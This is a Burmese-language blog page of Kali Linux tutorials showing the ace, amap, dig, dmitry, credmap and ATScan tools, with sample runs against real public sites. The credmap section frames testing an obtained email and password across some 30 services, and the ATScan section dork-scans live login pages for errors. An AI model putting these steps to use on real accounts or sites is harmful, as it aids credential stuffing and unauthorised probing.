-v (Optional) Enter the voice vlan ID
-r (Optional) Removes the VLAN interface
-d (Optional) Verbose | debug mode

ဒီလို မွတ္ထားႏိုင္ပါတယ္။ နမူနာ အသံုးျပဳကေတာ့ ေအာက္ပါအတိုင္း ျဖစ္ပါတယ္။
Example Usages:
Usage requires MAC Address of IP Phone supplied with -m option
Usage:  ace -t -m

Mode to automatically discover TFTP Server IP via DHCP Option 150 (-m)
Example:  ace -i eth0 -m 00:1E:F7:28:9C:8e

Mode to specify IP Address of TFTP Server
Example:  ace -i eth0 -t 192.168.10.150 -m 00:1E:F7:28:9C:8e

Mode to specify the Voice VLAN ID
Example: ace -i eth0 -v 96 -m 00:1E:F7:28:9C:8E

Verbose mode
Example: ace -i eth0 -v 96 -m 00:1E:F7:28:9C:8E -d

Mode to remove vlan interface
Example: ace -r eth0.96

Mode to auto-discover voice vlan ID in the listening mode for CDP
Example: ace -i eth0 -c 0 -m 00:1E:F7:28:9C:8E

Mode to auto-discover voice vlan ID in the spoofing mode for CDP
Example: ace -i eth0 -c 1 -m 00:1E:F7:28:9C:8E
..........................................................................................
ေနာက္တစ္ခုကေတာ့
root@kmn:~# amap
amap v5.4 (c) 2011 by van Hauser www.thc.org/thc-amap
Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o ] [-D ] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i ] [target port [port] ...]
Modes:
  -A         Map applications: send triggers and analyse responses (default)
  -B         Just grab banners, do not send triggers
  -P         No banner or application stuff - be a (full connect) port scanner
Options:
  -1         Only send triggers to a port until 1st identification. Speeeeed!
  -6         Use IPv6 instead of IPv4
  -b         Print ascii banner of responses
  -i FILE    Nmap machine readable outputfile to read ports from
  -u         Ports specified on commandline are UDP (default is TCP)
  -R         Do NOT identify RPC service
  -H         Do NOT send application triggers marked as potentially harmful
  -U         Do NOT dump unrecognised responses (better for scripting)
  -d         Dump all responses
  -v         Verbose mode, use twice (or more!) for debug (not recommended :-)
  -q         Do not report closed ports, and do not print them as unidentified
  -o FILE [-m] Write output to file FILE, -m creates machine readable output
  -c CONS    Amount of parallel connections to make (default 32, max 256)
  -C RETRIES Number of reconnects on connect timeouts (see -T) (default 3)
  -T SEC     Connect timeout on connection attempts in seconds (default 5)
  -t SEC     Response wait timeout in seconds (default 5)
  -p PROTO   Only send triggers for this protocol (e.g. ftp)
  TARGET PORT   The target address and port(s) to scan (additional to -i)
amap is a tool to identify application protocols on target ports.
Note: this version was NOT compiled with SSL support!
Usage hint: Options "-bqv" are recommended, add "-1" for fast/rush checks.
ျဖစ္ပါတယ္။
amapcrap လည္း ရွိပါေသးတယ္

root@kmn:~# amapcrap
amapcrap v5.4 (c) 2011 by van Hauser/THC

Syntax: amapcrap [-S] [-u] [-m 0ab] [-M min,max] [-n connects] [-N delay] [-w delay] [-e] [-v] TARGET PORT

Options:
    -S           use SSL after TCP connect (not usuable with -u)
    -u           use UDP protocol (default: TCP) (not usable with -c)
    -n connects  maximum number of connects (default: unlimited)
    -N delay     delay between connects in ms (default: 0)
    -w delay     delay before closing the port (default: 250)
    -e           do NOT stop when a response was made by the server
    -v           verbose mode
    -m 0ab       send as random crap:0-nullbytes, a-letters+spaces, b-binary
    -M min,max   minimum and maximum length of random crap
    TARGET PORT  target (ip or dns) and port to send random crap

This tool sends random data to a silent port to illicit a response, which can
then be used within amap for future detection. It outputs proper amap
appdefs definitions. Note: by default all modes are activated (0:10%, a:40%,
b:50%). Mode 'a' always sends one line with letters and spaces which end with
\r\n. Visit our homepage at http://www.thc.org
.................................................................................................
နမူနာ တစ္ခု သံုးျပပါမယ္
root@kmn:~# amap -bqv 192.168.1.15 80
Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
Using response file /etc/amap/appdefs.resp ... loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers

amap v5.4 (www.thc.org/thc-amap) started at 2017-03-30 10:13:03 - APPLICATION MAPPING mode

Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect
this connect

amap v5.4 finished at 2017-03-30 10:13:14
root@kmn:~#
ပါ။
တစ္ခုစီ ရွင္းျပဖို႔ဆိုရင္ေတာ့ ကြ်န္ေတာ္တို႔အတြက္ အရမ္း အခ်ိန္ေတြေပးရမွာျဖစ္ျပီး မွတ္ထားႏိုင္ဖို႔လည္း အလြန္ခက္ပါလိမ့္မယ္။ စာေတြ အမ်ားၾကီး က်က္ဖို႔လည္း လိုေနမွာပါ။
ကြ်န္ေတာ္ကေတာ့ အဲသည္နည္းကို အားမေပးတဲ့အတြက္ tools တစ္ခုစီမွာ သူ႔ေဖာ္ျပခ်က္နဲ႔သူ ရွိတယ္ဆိုတာေလးကို မွတ္ထားဖို႔ေလာက္ပဲ အားေပးခ်င္ပါတယ္။
...............................................

Thanks


Khit Minnyo
comments | | Read More...

Information မ်ားကို တူးဆြၾကည့္ျခင္း

Penulis : KhitMinnyo on Saturday, November 25, 2017 | November 25, 2017

Saturday, November 25, 2017



Kali Linux

Information Gathering
1. Using dig command
Terminal ကို ဖြင့္ျပီး dig လို႔ ရိုက္ enter ၾကည့္လိုက္ပါ။ dig ရဲ႕ info ေတြ ထြက္လာမွာျဖစ္ပါတယ္။ Example အေနနဲ႔ ေအာက္မွာ စမ္းျပထားပါတယ္။ ၾကည့္ၾကည့္ပါ။


root@kali:~# dig facebook.com

; <<>> DiG 9.10.3-P4-Debian <<>> facebook.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- 19245="" id:="" noerror="" opcode:="" p="" query="" status:="">;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1280
;; QUESTION SECTION:
;facebook.com. IN A

;; ANSWER SECTION:
facebook.com. 237 IN A 157.240.7.35

;; Query time: 49 msec
;; SERVER: 192.168.43.1#53(192.168.43.1)
;; WHEN: Mon Mar 27 03:12:04 EDT 2017
;; MSG SIZE  rcvd: 57
..............................................................................................
..............................................................................................

root@kali:~# dig google.com

; <<>> DiG 9.10.3-P4-Debian <<>> google.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- 54522="" id:="" noerror="" opcode:="" p="" query="" status:="">;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1280
;; QUESTION SECTION:
;google.com. IN A

;; ANSWER SECTION:
google.com. 119 IN A 216.58.196.14

;; Query time: 462 msec
;; SERVER: 192.168.43.1#53(192.168.43.1)
;; WHEN: Mon Mar 27 03:12:23 EDT 2017
;; MSG SIZE  rcvd: 55

..............................................................................................
..............................................................................................
ေအာက္ဆံုးမွာ စုေပးထားတဲ့ အခ်က္အလက္ေတြက အဓိက လိုရင္းျဖစ္ပါတယ္။
..............................................................................................
..............................................................................................





2. Using Dmitry
All programs >> Infomation Gathering>> dmitry ဆိုျပီး အစဥ္လိုက္ဖြင့္ၾကည့္လို႔ရသလို Applications>> 01. Information Gathering >> dmitry  ကေနလည္း ဖြင့္ႏိုင္ပါတယ္။ ေနာက္ဆံုးအခ်က္အေနနဲ႔ Terminal မွာ dmitry ဆိုျပီး ရိုက္ေခၚလို႔လည္း ရပါတယ္။ ကဲ သံုးနည္းလံုးနဲ႔ စမ္းဖြင့္ၾကည့္ပါဗ်ာ။ ခု သင္ခန္းစာမွာပါတဲ့ screenshot ေလးေတြမွာလည္း ပါတာမို႔ အဆင္ေျပလိမ့္မယ္လို႔ ယူဆပါတယ္ဗ်ာ။ ပါလာတဲ့ ပံုေလးေတြ ၾကည့္ၾကည့္ပါ။
ဖြင့္ျပီးျပီလို႔ပဲ ယူဆရေအာင္ဗ်ာ .......................
ဖြင့္လိုက္ျပီးတာနဲ႔ ေအာက္ပါအတိုင္း ျမင္ရမွာျဖစ္ပါတယ္။

root@kali:~# dmitry
Deepmagic Information Gathering Tool
"There be some deep magic going on"

Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
  -o Save output to %host.txt or to file specified by -o file
  -i Perform a whois lookup on the IP address of a host
  -w Perform a whois lookup on the domain name of a host
  -n Retrieve Netcraft.com information on a host
  -s Perform a search for possible subdomains
  -e Perform a search for possible email addresses
  -p Perform a TCP port scan on a host
* -f Perform a TCP port scan on a host showing output reporting filtered ports
* -b Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )
*Requires the -p flagged to be passed

Linux program  တိုင္းမွာ ခုလို ေဖာ္ျပေလးေတြ ရွိၾကပါတယ္။ ဒါမွ ဘာက ဘာအတြက္ သံုးမယ္ဆိုတာ သိမွာမို႔ပါ။ ခု ဒီထဲမွာ ပါဝင္တဲ့  option ေတြကိုပဲ အရင္  ၾကည့္ရေအာင္ပါ။

  -o Save output to %host.txt or to file specified by -o file
  -i Perform a whois lookup on the IP address of a host
  -w Perform a whois lookup on the domain name of a host
  -n Retrieve Netcraft.com information on a host
  -s Perform a search for possible subdomains
  -e Perform a search for possible email addresses
  -p Perform a TCP port scan on a host
* -f Perform a TCP port scan on a host showing output reporting filtered ports
* -b Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )

တစ္ေၾကာင္းခ်င္းစီ ရွင္းျပဖို႔ လိုမယ္ထင္ပါတယ္။ သိတဲ့သူေတြလည္း ၾကည့္လိုက္ပါဦး။ ေနာက္ပိုင္း ထပ္မံရွိလာမယ့္ ပရိုဂရမ္ေတြက် ကိုယ့္ဘာသာ လုပ္တတ္လာဖို႔ လိုအပ္ပါတယ္။ တစ္ခုခ်င္းစီကို Eng လို ေဖာ္ျပေပးထားျပီး ဖတ္ရလည္း လြယ္ပါတယ္။

  -o Save output to %host.txt or to file specified by -o file
သူကေတာ့ -o ကို သံုးရင္ output ကို save လုပ္ေပးမွာျဖစ္တယ္။ txt format နဲ႔ သိမ္းမွာပါ။

  -i Perform a whois lookup on the IP address of a host
host ရဲ႕ IP address ကို ၾကည့္ခ်င္တဲ့အခါ whois lookup ကို လုပ္ေဆာင္ေပးတယ္။

  -w Perform a whois lookup on the domain name of a host
host ရဲ႕ Domain name ကို ရွာဖို႔ေပါ့

  -n Retrieve Netcraft.com information on a host
Netcraft.com မွာ ေဖာ္ျပထားတဲ့ အခ်က္အလက္ေတြကို ရယူဖို႔ သံုးတယ္

  -s Perform a search for possible subdomains
ဒိုမိန္း အခြဲကေလးေတြကို ရွာေဖြေပးတဲ့ေနရာမွာ အသံုးျပဳပါတယ္

  -e Perform a search for possible email addresses
ဒါကေတာ့  ေမးလ္ ရွာတာေပါ့။ သူေဖာ္ျပထားတာေလးေတြက ရွင္းပါတယ္။

  -p Perform a TCP port scan on a host
host ကို TCP port scan လုပ္မယ္

* -f Perform a TCP port scan on a host showing output reporting filtered ports
* -b Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )
ေအာက္မွာ * နဲ႔ ျပထားတာေတတြကေတာ့ သတိျပဳေစခ်င္တာေတြ ပါရွိလို႔ ျဖစ္ပါတယ္။ ကဲ လက္ေတြ႕ စမ္းသံုးၾကည့္ရေအာင္ေနာ္။

................................................................................................................................
root@kali:~# dmitry -i google.com   #ကြ်န္ေတာ္ ရိုက္လိုက္တာ ဒီတစ္ေၾကာင္းတည္းပါ။ terminal ကေန အခ်ိန္မေရြး တိုက္ရိုက္ ရိုက္သံုးႏိုင္မွာျဖစ္ပါတယ္။
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:216.58.196.14 #ေဖာ္ျပထားတာေတြက ရွင္းပါတယ္ေနာ္
HostName:google.com #

Gathered Inet-whois information for 216.58.196.14
---------------------------------


inetnum:        216.0.0.0 - 216.158.95.255
netname:        NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr:          IPv4 address block not managed by the RIPE NCC
remarks:        ------------------------------------------------------
remarks:
remarks:        You can find the whois server to query, or the
remarks:        IANA registry to query on this web page:
remarks:        http://www.iana.org/assignments/ipv4-address-space
remarks:
remarks:        You can access databases of other RIRs at:
remarks:
remarks:        AFRINIC (Africa)
remarks:        http://www.afrinic.net/ whois.afrinic.net
remarks:
remarks:        APNIC (Asia Pacific)
remarks:        http://www.apnic.net/ whois.apnic.net
remarks:
remarks:        ARIN (Northern America)
remarks:        http://www.arin.net/  whois.arin.net
remarks:
remarks:        LACNIC (Latin America and the Carribean)
remarks:        http://www.lacnic.net/ whois.lacnic.net
remarks:
remarks:        IANA IPV4 Recovered Address Space
remarks:        http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
remarks:
remarks:        ------------------------------------------------------
country:        EU # Country is really world wide
admin-c:        IANA1-RIPE
tech-c:         IANA1-RIPE
status:         ALLOCATED UNSPECIFIED
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      RIPE-NCC-HM-MNT
mnt-routes:     RIPE-NCC-RPSL-MNT
created:        2016-11-16T15:56:23Z
last-modified:  2016-11-16T15:56:23Z
source:         RIPE

role:           Internet Assigned Numbers Authority
address:        see http://www.iana.org.
admin-c:        IANA1-RIPE
tech-c:         IANA1-RIPE
nic-hdl:        IANA1-RIPE
remarks:        For more information on IANA services
remarks:        go to IANA web site at http://www.iana.org.
mnt-by:         RIPE-NCC-MNT
created:        1970-01-01T00:00:00Z
last-modified:  2001-09-22T09:31:27Z
source:         RIPE # Filtered

% This query was served by the RIPE Database Query Service version 1.88 (WAGYU)



All scans completed, exiting
........................................................................................................................
root@kali:~# dmitry -n google.com #n  ကို သံုးထားတယ္ေနာ္။
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:216.58.196.14
HostName:google.com

Gathered Netcraft information for google.com
---------------------------------

Retrieving Netcraft.com information for google.com
Netcraft.com Information gathered
..........................................................................................................................
ဒီတစ္ခါေတာ့ n နဲ႔ o ဆိုတဲ့ option ႏွစ္ခုကို တြဲသံုးရေအာင္
root@kali:~# dmitry -on google.com #o နဲ႔ n နွစ္ခု တြဲသံုးထားတယ္ေနာ္
output ဘာလာမလဲ ကိုယ့္ဘာသာ စမ္းသပ္ၾကည့္ပါ။
..........................................................................................................................
root@kali:~# dmitry -no google.com      #ဒီလို ေရးရင္ေတာ့ txt ဖိုင္အေနနဲ႔ ထြက္လာမွာျဖစ္ျပီး
Deepmagic Information Gathering Tool
"There be some deep magic going on"

Writing output to 'google.com.txt' #ဖိုင္နာမည္ကို ဒီမွာ ေဖာ္ျပထားပါတယ္

HostIP:216.58.196.14
HostName:google.com

Gathered Netcraft information for google.com
---------------------------------

Retrieving Netcraft.com information for google.com
Netcraft.com Information gathered

All scans completed, exiting
root@kmn:~# leafpad google.com.txt #output ဖိုင္ကို ၾကည့္ခ်င္ရင္ ဒီလို ေခၚဖြင့္ၾကည့္ႏိုင္ပါတယ္
..........................................................................................................................

လိုအပ္တာေတြ စုေဆာင္းတဲ့ အပိုင္းပဲမို႔ အေသးစိတ္ မေျပာျပေသးဘူးေနာ္
က်န္တ့ဲ  option အားလံုးကို ကိုယ့္ဘာသာ စမ္းၾကည့္ထားၾကပါ



Thanks


Khit Minnyo
comments (1) | | Read More...

Checking many sites with one mail via Credmap (ျမန္မာလို)



Kali Linux
3. Checking many sites with one mail Credmap
mail တစ္ခုနဲ႔ Paswords တစ္ခု ရတဲ့အခါ ဘယ္ေနရာေတြမွာ အဲအတိုင္း ဖြင့္ဝင္သံုးထားလဲဆိုတာ ခဏေလးအတြင္း ေဖာ္ထုတ္ႏိုင္မယ့္ နည္းေလးပါ။
Credmap ကို အရင္ဆံုး ေဒါင္းယူထားဖို႔ လိုပါမယ္။
ဒီ link ကေန ေဒါင္းယူပါ   http://www.mediafire.com/file/5rp80a3mx2999lc/credmap.tar.gz
ျပီးရင္ေတာ့
tar ကို ေျဖ Desktop ေပၚ တင္။
...........................
cd Desktop
cd credmap
ls
cd credmap
chmod +x credmap.py
..............................................................
git clone တိုက္ယူလိုသူေတြကေတာ့
cd Desktop
git clone https://github.com/lightos/credmap.git
cd credmap
ls
cd credmap
chmod +x credmap.py
...................................


သြင္းျပီးရင္ေတာ့ သူ႔ကိ အသံုးျပဳနည္းေလးက
./credmap.py --email khitminnyo@khitminnyo.com --user khitminnyo@khitminnyo.com
ျဖစ္ပါတယ္။ ပထမဆံုး အစက္ကိုလည္း မက်န္ေစနဲ႔ပါ။
ကိုယ့္ mail ေလးေတြနဲ႔ ထည့္စမ္းၾကည့္ေနာ္

               . .IIIII             .II
  I123456IIII. I  II  .    II..IIIIIIIIIIIIIIIIIIII
 .  .IIIIII  II             IIIIIIHUNTER2IIIII  I.
    .IIIII.III I        IIIIIIIIIIIIIIIIIIIIIII
   .IILOVEII           II  .IIIII IIIIIIIIIIII. I
    IIIIII             IIII I  IISECRETIIIIIII I
    .II               IIIIIIIIIIIII  IIIIIIIII
       I.           .IIIABC123IIII    I   II  I
         .IIII        IIIIIIIIIIII     .       I
          IIIII.          IIIIII           . I.
          IIGODIII         IIIII             ..I  II .
           IIIIII          IIII...             IIII
            IIII           III. I            IISEXII
            III             I                I  III
            II                                   I   .
             I                                     

credmap v0.1-c4cd03d (https://github.com/lightos/credmap/)

[i] Please enter password:
ကိုယ္ ရ ထားတာေလး ထည့္။ စမ္းၾကည့္တဲ့အခါမွာေတာ့ ကိုယ့္ေမးနဲ႔ ကိုယ့္paswords နဲ႔ ထည့္စမ္းၾကည့္။ အဲသည္ mail & passwords အတိုင္း ဘယ္ေနရာေတြမွာ အေကာင့္ထပ္ဖြင့္ထားလဲဆိုတာကို သူက ေဖာ္ျပေပးမွာျဖစ္တယ္။
airbnb.com.xml        imgur.com.xml       stackoverflow.com.xml
amazon.com.xml        instagram.com.xml   trakt.tv.xml
bitbucket.org.xml     linkedin.com.xml    twitter.com.xml
digitalocean.com.xml  live.com.xml        vimeo.com.xml
ebay.com.xml          pastebin.com.xml    wunderlist.com.xml
en.wikipedia.org.xml  pinterest.com.xml   yahoo.com.xml
facebook.com.xml      reddit.com.xml      yelp.com.xml
foursquare.com.xml    scribd.com.xml      zoho.com.xml
github.com.xml        soundcloud.com.xml
groupon.com.xml       spotify.com.xml

သူ စစ္ေဆးေပးမယ့္ SITE ေတြက အထက္ပါ site  ေတြပဲျဖစ္ပါတယ္။ facebook, twitter, wiki နဲ႔   instagram တို႔မွာ အဲသည္ mail & passwords နဲ႔ ဖြင့္ထားမိရင္ အကုန္ ေပၚလာမွာျဖစ္ပါတယ္။ ဒါေၾကာင့္ mail ထည့္ျပီး စမ္းသပ္မယ့္အခါ facebook, twitter, instagram ေတြ ဖြင့္ထားတဲ့ mail နဲ႔ passwords နဲ႔ ထည့္စမ္းၾကည့္မွ ပိုသိသာပါလိမ့္မယ္။ ဆိုးက်ိဳးမရွိပါ။ စိတ္မခ်ရင္ gmail အသစ္တစ္ခုဖြင့္။ အဲဒါနဲ႔  facebook, twitter, wiki နဲ႔   instagram ေတြမွာ အေကာင့္သစ္ဖြင့္ ။ ျပီးရင္ ခုအတိုင္း စမ္းသပ္ၾကည့္ေပါ့။
.

Thanks

Khit Minnyo
comments (1) | | Read More...

Installing & Using ATScan (ျမန္မာလို)

Penulis : KhitMinnyo on Friday, November 24, 2017 | November 24, 2017

Friday, November 24, 2017




Kali Linux

1. Advance Dork Search With ATSCAN
ATSCAN ဆိုတာ Web ေတြရဲ႕ Vulnerable ေတြကို ရွာေဖြရာမွာ အသံုးျပဳတဲ့ Scanner တစ္မ်ိဳးျဖစ္ပါတယ္။ ATSCAN Version 12 ကို ဒီ လင့္ကေန ေဒါငး္ယူႏိုင္ပါတယ္။
https://github.com/AlisamTechnology/ATSCAN 
ကေန ေဒါင္းယူႏိုင္ပါတယ္။
OR
Terminal မွာ
cd Desktop
git clone https://github.com/AlisamTechnology/ATSCAN.git 
နဲ႔လည္းရယူႏိုင္ပါတယ္။
..............
ေဒါင္းတာဆိုရင္ေတာ့ ေဒါင္းပီးရင္ Desktop ေပၚမွာ extract လိုက္ပါ။ folder ေလးတစ္ခု ေတြ႕ျမင္လာရပါမယ္။ folder ေလးထဲကို cd command ကိုအသံုးျပဳျပီး ဝင္ေရာက္ထားလိုက္ပါ။
(cd Desktop, cd folder-name)
ျပီးတဲ့အခါ chmod +x install.sh  ကို အသံုးျပဳျပီး install  လုပ္ဖို႔အတြက္ ႀကိဳတင္ျပင္ဆင္လိုက္ရပါမယ္။ chmod +x သည္ executable permission ေပးျခင္းျဖစ္ပါတယ္။ ျပီးမွ ./install.sh ကို ေရြးျပီး enter ရမွာပါ (သတိထားရမွာက dot<.> မက်န္ခဲ့ဖို႔ပါပဲ။ ./install.sh ပါ။
ေရွ႕ဆံုးက . ကို သတိျပဳပါ။ Yes/No ေမးလာရင္ y ေပါ့။ enter ျပီးသြားတာနဲ႔ ေနာက္တစ္ခု ေမးလာပါတယ္။ အမွတ္တမဲ့ဆို ေမးမွန္းေတာင္ မသိႏိုင္ပါဘူး။ ၾကာေနတယ္ထင္ျပီး ထိုင္ေစာင့္ေနမွာစိုးလို႔ ဒီလိုေလး မွတ္ထားပါ။
yes or no ေမးလာလို႔ y ေရးျပီး enter ျပီးတဲ့ခါ စာ ၂ေၾကာင္း ေပၚလာပါမယ္။ default location ကိုပဲ ေမးတာပါ။ အဲအတိုင္းထားမွာျဖစ္လို႔ အဲစာ၂ေၾကာင္းအတြင္းမွာ ဘာမွ မျဖည့္ဘဲ enter  လိုက္ပါ။
ဒါဆိုရင္ေတာ့ သူ႔ဘာသာ အလုပ္ဆက္လုပ္သြားမွာျဖစ္ျပီး command line ေနာက္တစ္ဆင့္ ကူးသြားရင္ေတာ့  installation ျပီးဆံုးျပီးျပီ ျဖစ္ပါတယ္။
ATSCAN ကို ဘယ္လိုသံုးရမလဲ သိခ်င္ရင္ေတာ့ terminal မွာ atscan --help လို႔ ရိုက္ထည့္ျပီး enter လိုက္ရံုပါပဲ။ ခုက Dork Search ကို ေျပာခ်င္တာမို႔ Dork Search ကို ရွာေဖြပံုေလးပဲ တင္ေပးလိုက္ပါတယ္။ Terminal အသစ္ေလးဖြင့္ျပီး ဒီလိုေလး ရိုက္ၾကည့္လိုက္ပါ။
atscan --dork "login.php" --level 11
(ဒီေနရာေလးမွာ ေျပာခ်င္တာကေတာ့ level 10 ထက္ ပိုျမင့္တဲ့ကိန္းကိုသာ သံုးရပါမယ္။ ဥပမာ ၂၀ ေပါ့။ စသည္ျဖင့္ပါ။ ကြ်န္ေတာ္ကေတာ့ ၁၁ ပဲ စမ္းလိုက္ပါတယ္။)
.
.
            (>\---/<)
            ,'     `.
           /  q   p  \
          (  >(_Y_)<  )
          >-' `-' `-<- .="" p="">          /  _.== ==.,- \       Do not be 4 bl4ck h4cker!
         /,    )`  '(    )
        ; `._.'      `--<       _  _____ ____   ____    _    _   _
       :     \        |  )     / \|_   _/ ___| / ___|  / \  | \ | |
       \      )       ;_/     / _ \ | | \___ \| |     / _ \ |  \| |
       `._ _/_  ___.'-\\\    / ___ \| |  ___) | |___ / ___ \| |\  |
           `--\\\           /_/   \_\_| |____/ \____/_/   \_\_| \_| V 12
__________________________________________________________________________________

  Discleamer: Using ATSCAN to Attack targets without prior mutual consent is
  illegal! It is your own responsibility to obey laws! Alisam Technology is
  not linked to any kind of loss or misuse or damage caused by this program!
Argument "no" isn't numeric in numeric eq (==) at /root/Desktop/ATSCAN-master/inc/conf/upad.pl line 38.
  [!] A new update is aviable! To update: --update
__________________________________________________________________________________
----------------------------------------------------------------------------------
[!] Please wait...
[!] [02:53:00] ::: STARTING SEARCH ENGINE SCAN :::
----------------------------------------------------------------------------------
[::] ENGINE   [bing.com]
[::] DORK     [login.php]
[::] LEVEL    [11]
----------------------------------------------------------------------------------
[!] Please wait...
[!] 8 Unique Result(s) Found!
----------------------------------------------------------------------------------
    ==============================================================================
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ==============================================================================
    TARGET  [1/8] https://www.thoughtco.com/php-login-script-p2-2693850
    AGENT   Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; es_SV) Flock
    METHOD  GET
    HTTP    HTTP/1.1 500
    SERVER  Undefined
    IP      151.101.1.121
    ==============================================================================
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ==============================================================================
    TARGET  [2/8] https://www.thoughtco.com/php-
    AGENT   Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; es_SV) Flock
    METHOD  GET
    HTTP    HTTP/1.1 500
    SERVER  Undefined
    IP      151.101.65.121
    ==============================================================================
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ==============================================================================
    TARGET  [3/8] http://phpeasystep.com/phptu/6.html
    AGENT   Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; es_SV) Flock
    METHOD  GET
    HTTP    HTTP/1.1 200
    SERVER  nginx/1.10.3
    IP      192.185.5.187
    ERRORS  Possible errors detected!
            MYSQL: [num_rows]
            MYSQL: [mysql_]
    ==============================================================================
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ==============================================================================
    TARGET  [4/8] http://copyscape.com/login.php
    AGENT   Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; es_SV) Flock
    METHOD  GET
    HTTP    HTTP/1.1 200
    SERVER  Apache/2.2.15 (CentOS)
    IP      162.13.83.46
    ==============================================================================
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ==============================================================================
    TARGET  [5/8] http://www.html-form-guide.com/php-form/php-login-form.html
    AGENT   Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; es_SV) Flock
    METHOD  GET
    HTTP    HTTP/1.1 200
    SERVER  LiteSpeed
    IP      162.249.125.212
    CMS     Wordpress
    ERRORS  Possible errors detected!
            MYSQL: [Warning: mysql_]
            MYSQL: [function.mysql]
            MYSQL: [num_rows]
            MYSQL: [mysql_]
            PHP: [Warning: require]
            PHP: [Fatal error: require]
            PHP: [Warning: require_once]
            PHP: [function.require]
            UNDEFINED: [Fatal error]
    ==============================================================================
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ==============================================================================
    TARGET  [6/8] https://www.php-einfach.de/experte/php-codebeispiele/loginscript/
    AGENT   Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; es_SV) Flock
    METHOD  GET
    HTTP    HTTP/1.1 200
    SERVER  cloudflare-nginx
    IP      104.31.74.223
    CMS     Wordpress
    ==============================================================================
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ==============================================================================
    TARGET  [7/8] https://www.php-einfach.de/experte/php-codebeispiele/
    AGENT   Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; es_SV) Flock
    METHOD  GET
    HTTP    HTTP/1.1 200
    SERVER  cloudflare-nginx
    IP      104.31.75.223
    CMS     Wordpress
    ==============================================================================
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ==============================================================================
    TARGET  [8/8] http://www.tutorialspoint.com/php/php_login_example.htm
    AGENT   Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; es_SV) Flock
    METHOD  GET
    HTTP    HTTP/1.1 200
    SERVER  ECS (sin/BFE5)
    IP      117.18.237.191
    ERRORS  Possible errors detected!
            MYSQL: [mysql_]
----------------------------------------------------------------------------------
[!] 8 Unique Result(s) Found!
[!] [02:53:00] SCAN FINISHED!!

ေတြမိလားဗ်။ Target ရယ္။ အျခား info ေတြရယ္ ခ်ျပထားတာကိုေပါ့။

ခုေတာ့ ကြ်န္ေတာ္ ထည့္သြင္းထားတဲ့ ATSCAN ကေလးဟာ update ျဖစ္မျဖစ္နဲ႔ update ထြက္ရင္ ျမွင့္လို႔ ရေအာင္ ေအာက္ပါအတိုင္း စစ္ေဆးၾကည့္လိုက္ပါတယ္။ Terminal မွာေနာ္။
atscan --update
..
[!] Please wait...
[!] Checking for updates..
[!] Copying user components... OK
[!] Placing main script... OK
Cloning into '/root/Desktop/ATSCAN-master/atscan_update'...
remote: Counting objects: 5311, done.
remote: Total 5311 (delta 0), reused 0 (delta 0), pack-reused 5311
Receiving objects: 100% (5311/5311), 1.60 MiB | 188.00 KiB/s, done.
Resolving deltas: 100% (3099/3099), done.
[!] Placing components... OK
[!] Moving README.md to /usr/share/doc/atscan/... OK
[!] Moving License.txt to /usr/share/doc/atscan/... OK
[!] Checking others components... OK
[!] Moving /root/Desktop/ATSCAN-master/inc/conf/atscan to /etc/bash_completion.d/... OK
[!] Printing update log... OK
[!] Restauring user files... OK
[!] Deleting install files... OK
[!] Deleting /root/Desktop/ATSCAN-master/inc/conf/atscan... OK
[!] Deleting /root/Desktop/ATSCAN-master/install.sh... OK
[!] Deleting /root/Desktop/ATSCAN-master/README.md... OK
[!] Deleting /root/Desktop/ATSCAN-master/License.txt... OK
[!] Deleting /root/Desktop/ATSCAN-master/version_bac.log... OK
[!] Tool updeted with success!

VERSION 12 RELEASE
=====================================================
  CHANGES: 20/02/2017
